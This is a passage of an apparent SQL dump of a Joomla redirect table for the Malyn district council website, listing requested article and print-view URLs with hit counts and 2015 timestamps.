00:00:00',301),(13867,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11&lang=ru&Itemid=0','','','',2,0,'2015-05-30 06:00:33','0000-00-00 00:00:00',301),(13868,'http://www.malyn-rayrada.org.ua/index.php?Itemid=6&id=5&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2015-05-30 07:06:18','0000-00-00 00:00:00',301),(13869,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1229:2014-02-28-09-49-28&lang=uk&option=com_content&view=article','','','',1,0,'2015-05-30 07:18:32','0000-00-00 00:00:00',301),(13870,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=198:------------2006-2010-r&catid=29&Itemid=60&lang=uk','','','',13,0,'2015-05-30 08:03:05','0000-00-00 00:00:00',301),(13871,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/42-informacija-dibrivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-30 11:08:58','0000-00-00 00:00:00',301),(13872,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/756-informacija-ivanivskoi-silskoi-radi','','','',1,0,'2015-05-30 11:09:03','0000-00-00 00:00:00',301),(13873,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/756-informacija-ivanivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-30 11:09:07','0000-00-00 00:00:00',301),(13874,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/757-informacija-malinivskoi-silskoi-radi','','','',1,0,'2015-05-30 11:09:11','0000-00-00 00:00:00',301),(13875,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/757-informacija-malinivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-30 11:09:14','0000-00-00 00:00:00',301),(13876,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/758-informacija-josipivskoi-silskoi-radi','','','',1,0,'2015-05-30 11:09:18','0000-00-00 00:00:00',301),(13877,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/764-informacija-ukrainkivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-30 11:09:21','0000-00-00 00:00:00',301),(13878,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/765-informacija-vishivskoi-silskoi-radi','','','',1,0,'2015-05-30 11:09:25','0000-00-00 00:00:00',301),(13879,'http://malyn-rayrada.org.ua/index.php/498-vidbulas-18-sesija-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-30 11:09:29','0000-00-00 00:00:00',301),(13880,'http://malyn-rayrada.org.ua/index.php/500-upravlinnja-statistiki-v-m-malin-informue?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-30 11:09:33','0000-00-00 00:00:00',301),(13881,'http://malyn-rayrada.org.ua/index.php/882-pro-sotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-serpen-2014-roku?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-30 11:09:40','0000-00-00 00:00:00',301),(13882,'http://malyn-rayrada.org.ua/index.php/725-pro-priznachennja-s-kizina-golovoju-zhitomirskoi','','http://go.mail.ru/search_images','',6,0,'2015-05-30 23:47:02','0000-00-00 00:00:00',301),(13883,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-05-31 02:37:58','0000-00-00 00:00:00',301),(13884,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-05-31 02:38:09','0000-00-00 00:00:00',301),(13885,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2015-05-31 02:38:12','0000-00-00 00:00:00',301),(13886,'http://www.malyn-rayrada.org.ua/index.php/198-chi-budut-novovvedennja-v-roboti-pozhezhnih?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-31 02:48:51','0000-00-00 00:00:00',301),(13887,'http://www.malyn-rayrada.org.ua/index.php/405-obgovoreno-pitannja-zabezpechennja-zhiteliv?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 02:48:55','0000-00-00 00:00:00',301),(13888,'http://www.malyn-rayrada.org.ua/index.php/62-priznachennja-tizhnja?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-31 02:49:12','0000-00-00 00:00:00',301),(13889,'http://www.malyn-rayrada.org.ua/index.php/69-v-ukrainu-nadijshla-persha-partija-efirnih?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 02:49:42','0000-00-00 00:00:00',301),(13890,'http://malyn-rayrada.org.ua/xmlrpc.php?rsd','','','',1,0,'2015-05-31 03:29:12','0000-00-00 00:00:00',301),(13891,'http://malyn-rayrada.org.ua/blog/','','','',1,0,'2015-05-31 03:29:16','0000-00-00 00:00:00',301),(13892,'http://www.malyn-rayrada.org.ua/index.php/716-pro-sklikannja-28-pozachergovoi-sesii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-31 03:31:59','0000-00-00 00:00:00',301),(13893,'http://www.malyn-rayrada.org.ua/index.php/725-pro-priznachennja-s-kizina-golovoju-zhitomirskoi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-31 03:32:02','0000-00-00 00:00:00',301),(13894,'http://www.malyn-rayrada.org.ua/index.php/726-nachalnik-ovruckogo-mrv-kvi-ivan-levchenko-alkogol?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-31 03:32:07','0000-00-00 00:00:00',301),(13895,'http://www.malyn-rayrada.org.ua/index.php/732-pro-sklikannja-29-sesii-rajonnoi-radi-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 03:32:12','0000-00-00 00:00:00',301),(13896,'http://www.malyn-rayrada.org.ua/index.php/738-pro-chastkovu-mobilizaciju?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 03:32:17','0000-00-00 00:00:00',301),(13897,'http://malyn-rayrada.org.ua/index.php/121-z-novim-rokom-ta-rizdvom-hristovim','','','',1,0,'2015-05-31 04:31:28','0000-00-00 00:00:00',301),(13898,'http://malyn-rayrada.org.ua/index.php/121-z-novim-rokom-ta-rizdvom-hristovim?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:31:40','0000-00-00 00:00:00',301),(13899,'http://malyn-rayrada.org.ua/index.php/143-hto-otrimae-cifrovi-tv-tjuneri-bezkoshtovno','','','',1,0,'2015-05-31 04:31:44','0000-00-00 00:00:00',301),(13900,'http://malyn-rayrada.org.ua/index.php/198-chi-budut-novovvedennja-v-roboti-pozhezhnih','','','',1,0,'2015-05-31 04:31:56','0000-00-00 00:00:00',301),(13901,'http://malyn-rayrada.org.ua/index.php/198-chi-budut-novovvedennja-v-roboti-pozhezhnih?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:32:08','0000-00-00 00:00:00',301),(13902,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/780-informacija-shevchenkivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:33:45','0000-00-00 00:00:00',301),(13903,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/787-informue-gorinska-silska-rada','','','',1,0,'2015-05-31 04:33:49','0000-00-00 00:00:00',301),(13904,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/787-informue-gorinska-silska-rada?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:33:54','0000-00-00 00:00:00',301),(13905,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/792-informacija-lukivskoi-silskoi-radi','','','',2,0,'2015-05-31 04:33:59','0000-00-00 00:00:00',301),(13906,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/792-informacija-lukivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:34:07','0000-00-00 00:00:00',301),(13907,'http://malyn-rayrada.org.ua/index.php/23-vesna-prijde-lishe-u-20-chislah-kvitnja','','','',2,0,'2015-05-31 04:34:13','0000-00-00 00:00:00',301),(13908,'http://malyn-rayrada.org.ua/index.php/23-vesna-prijde-lishe-u-20-chislah-kvitnja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:34:18','0000-00-00 00:00:00',301),(13909,'http://malyn-rayrada.org.ua/index.php/253-pro-sklikannja-15-pozachergovoi-sesii-rajonnoi','','','',1,0,'2015-05-31 04:34:26','0000-00-00 00:00:00',301),(13910,'http://malyn-rayrada.org.ua/index.php/253-pro-sklikannja-15-pozachergovoi-sesii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:34:34','0000-00-00 00:00:00',301),(13911,'http://malyn-rayrada.org.ua/index.php/255-vidbulas-14-sesija-malinskoi-rajonnoi-radi','','','',6,0,'2015-05-31 04:34:40','0000-00-00 00:00:00',301),(13912,'http://malyn-rayrada.org.ua/index.php/255-vidbulas-14-sesija-malinskoi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:34:46','0000-00-00 00:00:00',301),(13913,'http://malyn-rayrada.org.ua/index.php/256-upravlinnja-pfu-v-malinskomu-rajoni-informue?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:35:02','0000-00-00 00:00:00',301),(13914,'http://malyn-rayrada.org.ua/index.php/257-do-vidoma-vlasnikiv-avto?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:35:18','0000-00-00 00:00:00',301),(13915,'http://malyn-rayrada.org.ua/index.php/276-shhodo-pererozpodilu-subvencii-z-derzhavnogo','','','',3,0,'2015-05-31 04:35:32','0000-00-00 00:00:00',301),(13916,'http://malyn-rayrada.org.ua/index.php/276-shhodo-pererozpodilu-subvencii-z-derzhavnogo?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:35:38','0000-00-00 00:00:00',301),(13917,'http://malyn-rayrada.org.ua/index.php/277-vikonannja-dohidnoi-chastini-bjudzhetiv-oblasti-za','','','',3,0,'2015-05-31 04:35:46','0000-00-00 00:00:00',301),(13918,'http://malyn-rayrada.org.ua/index.php/277-vikonannja-dohidnoi-chastini-bjudzhetiv-oblasti-za?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:35:51','0000-00-00 00:00:00',301),(13919,'http://malyn-rayrada.org.ua/index.php/294-deputati-zaboronili-kuriti-u-gromadskih-miscjah','','','',4,0,'2015-05-31 04:35:56','0000-00-00 00:00:00',301),(13920,'http://malyn-rayrada.org.ua/index.php/294-deputati-zaboronili-kuriti-u-gromadskih-miscjah?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:36:00','0000-00-00 00:00:00',301),(13921,'http://malyn-rayrada.org.ua/index.php/297-startuvala-vstupna-kampanija','','','',5,0,'2015-05-31 04:36:05','0000-00-00 00:00:00',301),(13922,'http://malyn-rayrada.org.ua/index.php/297-startuvala-vstupna-kampanija?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:36:09','0000-00-00 00:00:00',301),(13923,'http://malyn-rayrada.org.ua/index.php/298-zasluzhenomu-budivelniku-ukraini-viktoru-jakovichu','','','',3,0,'2015-05-31 04:36:29','0000-00-00 00:00:00',301),(13924,'http://malyn-rayrada.org.ua/index.php/298-zasluzhenomu-budivelniku-ukraini-viktoru-jakovichu?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:36:34','0000-00-00 00:00:00',301),(13925,'http://malyn-rayrada.org.ua/index.php/325-ukrainci-perevedut-strilki-godinnika-na-godinu?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-31 04:36:49','0000-00-00 00:00:00',301),(13926,'http://malyn-rayrada.org.ua/index.php/327-zaversheno-pidgotovku-do-chergovoi-sesii-rajonnoi','','','',3,0,'2015-05-31 04:36:54','0000-00-00 00:00:00',301),(13927,'http://malyn-rayrada.org.ua/index.php/327-zaversheno-pidgotovku-do-chergovoi-sesii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:36:57','0000-00-00 00:00:00',301),(13928,'http://malyn-rayrada.org.ua/index.php/373-dani-pro-vikonannja-dohidnoi-chastini-za-9','','','',1,0,'2015-05-31 04:37:02','0000-00-00 00:00:00',301),(13929,'http://malyn-rayrada.org.ua/index.php/442-vitaemo-z-novim-2013-rokom-ta-rizdvom-hristovim','','','',3,0,'2015-05-31 04:37:06','0000-00-00 00:00:00',301),(13930,'http://malyn-rayrada.org.ua/index.php/465-ogoloshennja_3','','','',2,0,'2015-05-31 04:37:19','0000-00-00 00:00:00',301),(13931,'http://malyn-rayrada.org.ua/index.php/465-ogoloshennja_3?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:37:24','0000-00-00 00:00:00',301),(13932,'http://malyn-rayrada.org.ua/index.php/467-mikola-dushko-problem-z-reestracieju-zemli-bude?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:37:36','0000-00-00 00:00:00',301),(13933,'http://malyn-rayrada.org.ua/index.php/511-vidpovid-korostenskoi-direkcii-zaliznichnih?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:37:40','0000-00-00 00:00:00',301),(13934,'http://malyn-rayrada.org.ua/index.php/512-ukrainci-z-nedili-budut-spati-na-godinu-menshe?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:37:47','0000-00-00 00:00:00',301),(13935,'http://malyn-rayrada.org.ua/index.php/520-vikonannja-dohidnoi-chastini-za-pershij-kvartal','','','',4,0,'2015-05-31 04:38:04','0000-00-00 00:00:00',301),(13936,'http://malyn-rayrada.org.ua/index.php/520-vikonannja-dohidnoi-chastini-za-pershij-kvartal?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-31 04:38:10','0000-00-00 00:00:00',301),(13937,'http://malyn-rayrada.org.ua/index.php/527-taka-pogoda-prognozuetsja-do-kincja-tizhnja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:38:15','0000-00-00 00:00:00',301),(13938,'http://malyn-rayrada.org.ua/index.php/528-ocinka-rezultativ-dijalnosti-rajderzhadministracij?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:38:25','0000-00-00 00:00:00',301),(13939,'http://malyn-rayrada.org.ua/index.php/529-propozicii-shhodo-zmini-sistemi-miscevih-viboriv','','','',3,0,'2015-05-31 04:38:34','0000-00-00 00:00:00',301),(13940,'http://malyn-rayrada.org.ua/index.php/529-propozicii-shhodo-zmini-sistemi-miscevih-viboriv?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:38:42','0000-00-00 00:00:00',301),(13941,'http://malyn-rayrada.org.ua/index.php/547-pro-zatverdzhennja-porjadku-ta-umov-viznachennja','','','',1,0,'2015-05-31 04:38:47','0000-00-00 00:00:00',301),(13942,'http://malyn-rayrada.org.ua/index.php/547-pro-zatverdzhennja-porjadku-ta-umov-viznachennja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:38:52','0000-00-00 00:00:00',301),(13943,'http://malyn-rayrada.org.ua/index.php/548-upravlinnja-veterinarnoi-medicini-v-malinskomu','','','',2,0,'2015-05-31 04:38:56','0000-00-00 00:00:00',301),(13944,'http://malyn-rayrada.org.ua/index.php/548-upravlinnja-veterinarnoi-medicini-v-malinskomu?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:39:01','0000-00-00 00:00:00',301),(13945,'http://malyn-rayrada.org.ua/index.php/550-ukraina-vidznachae-den-konstitucii?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:39:09','0000-00-00 00:00:00',301),(13946,'http://malyn-rayrada.org.ua/index.php/553-do-vidoma-deputativ-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:39:13','0000-00-00 00:00:00',301),(13947,'http://malyn-rayrada.org.ua/index.php/578-vikonannja-dohidnoi-chastini-za-pershe-pivrichchja','','','',1,0,'2015-05-31 04:39:39','0000-00-00 00:00:00',301),(13948,'http://malyn-rayrada.org.ua/index.php/578-vikonannja-dohidnoi-chastini-za-pershe-pivrichchja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:39:46','0000-00-00 00:00:00',301),(13949,'http://malyn-rayrada.org.ua/index.php/61-splivajut-ostanni-godini-dlja-podachi-dokumentiv','','','',1,0,'2015-05-31 04:40:12','0000-00-00 00:00:00',301),(13950,'http://malyn-rayrada.org.ua/index.php/62-priznachennja-tizhnja','','','',1,0,'2015-05-31 04:40:30','0000-00-00 00:00:00',301),(13951,'http://malyn-rayrada.org.ua/index.php/69-v-ukrainu-nadijshla-persha-partija-efirnih?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:41:44','0000-00-00 00:00:00',301),(13952,'http://malyn-rayrada.org.ua/index.php/709-informacijne-upravlinnja-aparatu-verhovnoi-radi','','','',1,0,'2015-05-31 04:42:33','0000-00-00 00:00:00',301),(13953,'http://malyn-rayrada.org.ua/index.php/713-biatlon-zhinocha-estafeta-zoloto?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:42:53','0000-00-00 00:00:00',301),(13954,'http://malyn-rayrada.org.ua/index.php/714-verhovna-rada-obrala-novim-spikerom-oleksandra','','','',3,0,'2015-05-31 04:42:59','0000-00-00 00:00:00',301),(13955,'http://malyn-rayrada.org.ua/index.php/714-verhovna-rada-obrala-novim-spikerom-oleksandra?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:43:03','0000-00-00 00:00:00',301),(13956,'http://malyn-rayrada.org.ua/index.php/716-pro-sklikannja-28-pozachergovoi-sesii-rajonnoi','','','',1,0,'2015-05-31 04:43:07','0000-00-00 00:00:00',301),(13957,'http://malyn-rayrada.org.ua/index.php/716-pro-sklikannja-28-pozachergovoi-sesii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:43:11','0000-00-00 00:00:00',301),(13958,'http://malyn-rayrada.org.ua/index.php/726-nachalnik-ovruckogo-mrv-kvi-ivan-levchenko-alkogol','','','',2,0,'2015-05-31 04:44:52','0000-00-00 00:00:00',301),(13959,'http://malyn-rayrada.org.ua/index.php/732-pro-sklikannja-29-sesii-rajonnoi-radi-6-sklikannja','','','',3,0,'2015-05-31 04:45:22','0000-00-00 00:00:00',301),(13960,'http://malyn-rayrada.org.ua/index.php/732-pro-sklikannja-29-sesii-rajonnoi-radi-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:45:28','0000-00-00 00:00:00',301),(13961,'http://malyn-rayrada.org.ua/index.php/738-pro-chastkovu-mobilizaciju','','','',1,0,'2015-05-31 04:45:32','0000-00-00 00:00:00',301),(13962,'http://malyn-rayrada.org.ua/index.php/748-pro-priznachennja-ju-martinjuka-golovoju-malinskoi','','','',3,0,'2015-05-31 04:46:22','0000-00-00 00:00:00',301),(13963,'http://malyn-rayrada.org.ua/index.php/748-pro-priznachennja-ju-martinjuka-golovoju-malinskoi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:46:27','0000-00-00 00:00:00',301),(13964,'http://malyn-rayrada.org.ua/index.php/75-vitaemo-iz-svjatom-8-bereznja','','','',1,0,'2015-05-31 04:46:32','0000-00-00 00:00:00',301),(13965,'http://malyn-rayrada.org.ua/index.php/763-nachalnik-mrv-kvi-ivan-levchenko-informue?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:47:10','0000-00-00 00:00:00',301),(13966,'http://malyn-rayrada.org.ua/index.php/836-komunalne-pidpriemstvo-arhplan-malinskoi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:48:01','0000-00-00 00:00:00',301),(13967,'http://malyn-rayrada.org.ua/index.php/838-upravlinnja-statistiki-u-m-malini-informue-3','','','',1,0,'2015-05-31 04:48:06','0000-00-00 00:00:00',301),(13968,'http://malyn-rayrada.org.ua/index.php/838-upravlinnja-statistiki-u-m-malini-informue-3?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:48:10','0000-00-00 00:00:00',301),(13969,'http://malyn-rayrada.org.ua/index.php/842-informacija-shhodo-indeksacii-pensij','','','',5,0,'2015-05-31 04:48:16','0000-00-00 00:00:00',301),(13970,'http://malyn-rayrada.org.ua/index.php/842-informacija-shhodo-indeksacii-pensij?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-31 04:48:22','0000-00-00 00:00:00',301),(13971,'http://www.malyn-rayrada.org.ua/index.php/389-shhodo-rozderzhavlennja-drukovanih-zasobiv-masovoi','','http://go.mail.ru/search_images','',33,0,'2015-05-31 08:58:46','0000-00-00 00:00:00',301),(13972,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=709:2012-06-14-15-04-11&lang=ru&option=com_content&view=article','','','',4,0,'2015-05-31 16:50:59','0000-00-00 00:00:00',301),(13973,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=36&Itemid=70&lang=en','','','',1,0,'2015-05-31 22:10:31','0000-00-00 00:00:00',301),(13974,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=4:2010-08-13-08-15-19&lang=uk&Itemid=','','','',3,0,'2015-05-31 22:49:18','0000-00-00 00:00:00',301),(13975,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=38:2010-06-11-09-28-19&catid=11&Itemid=16&lang=ru','','','',3,0,'2015-05-31 23:12:54','0000-00-00 00:00:00',301),(13976,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=4:2010-08-13-08-15-19&lang=uk','','','',1,0,'2015-05-31 23:34:29','0000-00-00 00:00:00',301),(13977,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=42:-2010-&catid=1&Itemid=10&lang=uk','','','',2,0,'2015-05-31 23:48:16','0000-00-00 00:00:00',301),(13978,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=121:2010-09-08-08-42-57&catid=11&Itemid=16&lang=ru','','','',3,0,'2015-06-01 00:32:38','0000-00-00 00:00:00',301),(13979,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=838:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-06-01 00:36:31','0000-00-00 00:00:00',301),(13980,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=403:2011-09-29-05-41-20&catid=11&lang=en','','','',3,0,'2015-06-01 00:37:29','0000-00-00 00:00:00',301),(13981,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1243:2014-03-17-07-32-47&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2015-06-01 00:45:15','0000-00-00 00:00:00',301),(13982,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1108:-24-&catid=11&lang=en&Itemid=','','','',1,0,'2015-06-01 00:46:33','0000-00-00 00:00:00',301),(13983,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=117:2--65-------&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',7,0,'2015-06-01 00:47:50','0000-00-00 00:00:00',301),(13984,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=203:2010-12-15-14-10-45&catid=29:--15122010-&Itemid=60&lang=uk','','','',4,0,'2015-06-01 01:11:07','0000-00-00 00:00:00',301),(13985,'http://www.malyn-rayrada.org.ua/index.php/1084-grafik-provedennya-zasidannya-postijnikh-komisij','','','',11,0,'2015-06-01 01:14:54','0000-00-00 00:00:00',301),(13986,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1148:29-2013-25-&catid=11&Itemid=14&lang=en','','','',2,0,'2015-06-01 01:16:27','0000-00-00 00:00:00',301),(13987,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=5&Itemid=1&lang=uk&limitstart=20','','','',1,0,'2015-06-01 02:14:11','0000-00-00 00:00:00',301),(13988,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1206:-------l---28r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2015-06-01 02:37:48','0000-00-00 00:00:00',301),(13989,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1136:-2013-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2015-06-01 03:08:15','0000-00-00 00:00:00',301),(13990,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=55&lang=uk','','','',1,0,'2015-06-01 03:09:55','0000-00-00 00:00:00',301),(13991,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=49:2010-06-16-14-16-00&catid=1:-14052010&Itemid=10&lang=en','','','',2,0,'2015-06-01 03:15:21','0000-00-00 00:00:00',301),(13992,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=42:-2010-&catid=1&Itemid=10&lang=ru','','','',1,0,'2015-06-01 03:20:18','0000-00-00 00:00:00',301),(13993,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=547:----------l---------r--2011-2016-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2015-06-01 03:21:31','0000-00-00 00:00:00',301),(13994,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1180:27-4-2014-&catid=11&Itemid=14&lang=en','','','',1,0,'2015-06-01 03:37:13','0000-00-00 00:00:00',301),(13995,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=75:2010-07-30-10-51-13&catid=11&Itemid=16&lang=ru','','','',2,0,'2015-06-01 04:09:10','0000-00-00 00:00:00',301),(13996,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=1:-14052010&layout=blog&Itemid=10&lang=ru','','','',3,0,'2015-06-01 04:10:21','0000-00-00 00:00:00',301),(13997,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=121:2010-09-08-08-42-57&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',5,0,'2015-06-01 04:15:10','0000-00-00 00:00:00',301),(13998,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=117:2--65-------&catid=11:2010-06-05-14-33-33&Itemid=16&lang=ru','','','',3,0,'2015-06-01 04:15:49','0000-00-00 00:00:00',301),(13999,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=529:2012-01-05-19-10-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-06-01 04:19:05','0000-00-00 00:00:00',301),(14000,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=787:2012-10-15-09-13-25&catid=36&Itemid=70&lang=ru','','','',2,0,'2015-06-01 04:48:48','0000-00-00 00:00:00',301),(14001,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=5&Itemid=1&lang=en&limitstart=20','','','',2,0,'2015-06-01 05:05:36','0000-00-00 00:00:00',301),(14002,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=55&lang=ru','','','',1,0,'2015-06-01 05:21:50','0000-00-00 00:00:00',301),(14003,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=5&Itemid=0&lang=ru','','','',3,0,'2015-06-01 06:30:16','0000-00-00 00:00:00',301),(14004,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=403:2011-09-29-05-41-20&catid=11&lang=en&Itemid=','','','',2,0,'2015-06-01 06:40:54','0000-00-00 00:00:00',301),(14005,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=909:2013-01-21-10-09-40&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2015-06-01 06:44:27','0000-00-00 00:00:00',301),(14006,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1108:-24-&catid=11&Itemid=14&lang=uk','','','',1,0,'2015-06-01 06:46:15','0000-00-00 00:00:00',301),(14007,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=511:2011-12-20-17-57-17&catid=11&lang=en&Itemid=','','','',2,0,'2015-06-01 07:52:50','0000-00-00 00:00:00',301),(14008,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=38:2010-06-11-09-28-19&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',3,0,'2015-06-01 07:53:05','0000-00-00 00:00:00',301),(14009,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=253:17-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-06-01 07:58:33','0000-00-00 00:00:00',301),(14010,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11&lang=en&Itemid=0','','','',1,0,'2015-06-01 08:25:20','0000-00-00 00:00:00',301),(14011,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=82:2010-08-05-05-31-16&catid=11&Itemid=16&lang=ru','','','',2,0,'2015-06-01 08:34:31','0000-00-00 